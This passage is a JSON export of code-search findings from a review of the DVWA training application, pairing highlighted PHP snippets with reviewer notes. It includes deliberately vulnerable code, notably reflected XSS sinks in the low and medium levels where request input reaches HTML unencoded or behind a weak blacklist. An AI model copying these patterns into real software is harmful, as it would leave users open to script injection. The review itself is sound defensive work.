  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>Hello '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> }\n<span 
class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">10:</span> ",
  "line": 6,
  "start": 1,
  "end": 11,
  "severity": "unknown",
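  "note": "Reflected XSS sink: $_GET['name'] is concatenated straight into the HTML appended to $html, with no validation or output encoding. The only check (line 4) is that the parameter exists and is not NULL. Encode on output as impossible.php does with htmlspecialchars()."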
 },
 {
  "id": 291,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> 
\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Hello ${name}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 292,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/medium.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'&lt;script>'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">7:</span> 
\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Hello ${name}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> }\n<span class=\"line-number\">11:</span> ",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
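  "note": "str_replace removes only the exact, case-sensitive literal script opening tag and nothing else; line 9 then interpolates $name into the pre element without HTML encoding. This is a blacklist, not output encoding, so the finding stands at this level. Encode on output as impossible.php does with htmlspecialchars()."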
 },
 {
  "id": 29,
  "file": "/home/chris/src/DVWA-master/dvwa/includes/dvwaPhpIds.inc.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">59:</span> \t\t<span class=\"token operator\">*</span> <span class=\"token keyword\">with</span> your variables_order settings\n<span class=\"line-number\">60:</span> \t\t<span class=\"token operator\">*</span><span class=\"token operator\">/</span>\n<span class=\"line-number\">61:</span> \t\t<span class=\"token variable\">$request</span> <span class=\"token operator\">=</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span>\n<span class=\"line-number\">62:</span> \t\t\t<span class=\"token string\">'REQUEST'</span> <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">,</span>\n<span class=\"line-number\">63:</span> \t\t\t<span class=\"token string\">'GET'</span>     <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">,</span>\n<span class=\"highlight\"><span class=\"line-number\">64:</span> \t\t\t<span class=\"token string\">'POST'</span>    <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">,</span></span>\n<span class=\"line-number\">65:</span> \t\t\t<span class=\"token string\">'COOKIE'</span>  <span class=\"token operator\">=</span><span class=\"token operator\">></span> <span class=\"token variable\">$_COOKIE</span>\n<span class=\"line-number\">66:</span> \t\t<span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">67:</span> \n<span class=\"line-number\">68:</span> \t\t<span class=\"token variable\">$init</span> <span class=\"token operator\">=</span> IDS_Init<span class=\"token punctuation\">:</span><span class=\"token punctuation\">:</span><span class=\"token function\">init</span><span 
class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_PHPIDS <span class=\"token punctuation\">.</span> <span class=\"token string\">'lib/IDS/Config/Config.ini'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">69:</span> ",
  "line": 64,
  "start": 59,
  "end": 70,
  "severity": "unknown",
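  "note": "Likely not a sink: in the lines shown, $_POST is only copied into the $request array next to REQUEST, GET and COOKIE, and line 68 loads the PHPIDS configuration. How $request is consumed is outside this excerpt; confirm it is only inspected before closing the finding."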
 },
 {
  "id": 43,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token function\">dvwaDatabaseConnect</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> \n<span class=\"highlight\"><span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span 
class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 10,
  "start": 5,
  "end": 16,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 44,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Login'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">12:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'login.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"highlight\"><span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span 
class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 14,
  "start": 9,
  "end": 20,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 45,
  "file": "/home/chris/src/DVWA-master/login.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'username'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token 
string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$user</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> \n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'password'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">19:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">stripslashes</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">20:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token 
punctuation\">(</span><span class=\"token function\">isset</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token function\">is_object</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token function\">mysqli_real_escape_string</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">:</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token function\">trigger_error</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"[MySQLConverterToo] Fix the mysql_escape_string() call! 
This code does not work.\"</span><span class=\"token punctuation\">,</span> E_USER_ERROR<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">?</span> <span class=\"token string\">\"\"</span> <span class=\"token punctuation\">:</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t<span class=\"token variable\">$pass</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$pass</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \n<span class=\"line-number\">23:</span> \t<span class=\"token variable\">$query</span> <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span>\"<span class=\"token keyword\">SELECT</span> table_schema<span class=\"token punctuation\">,</span> table_name<span class=\"token punctuation\">,</span> create_time",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 52,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span>   <span class=\"token operator\">=</span> <span class=\"token string\">'DVWA Security'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'security'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"line-number\">12:</span> <span class=\"token variable\">$securityHtml</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> 
<span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> {",
  "line": 13,
  "start": 8,
  "end": 19,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 53,
  "file": "/home/chris/src/DVWA-master/security.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">13:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string\">'seclev_submit'</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">14:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Anti<span class=\"token operator\">-</span>CSRF\n<span class=\"line-number\">15:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'security.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> \n<span class=\"line-number\">17:</span> \t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">''</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">18:</span> \t<span class=\"token function\">switch</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span> 
<span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">19:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'low'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">20:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'low'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">21:</span> \t\t\tbreak<span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">22:</span> \t\t<span class=\"token keyword\">case</span> <span class=\"token string\">'medium'</span><span class=\"token punctuation\">:</span>\n<span class=\"line-number\">23:</span> \t\t\t<span class=\"token variable\">$securityLevel</span> <span class=\"token operator\">=</span> <span class=\"token string\">'medium'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 18,
  "start": 13,
  "end": 24,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 56,
  "file": "/home/chris/src/DVWA-master/setup.php",
  "filetype": "php",
  "search": "\\s\\$_POST",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span>   <span class=\"token operator\">=</span> <span class=\"token string\">'Setup'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page_id'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'setup'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">11:</span> \n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'create_db'</span> <span class=\"token punctuation\">]</span> <span class=\"token 
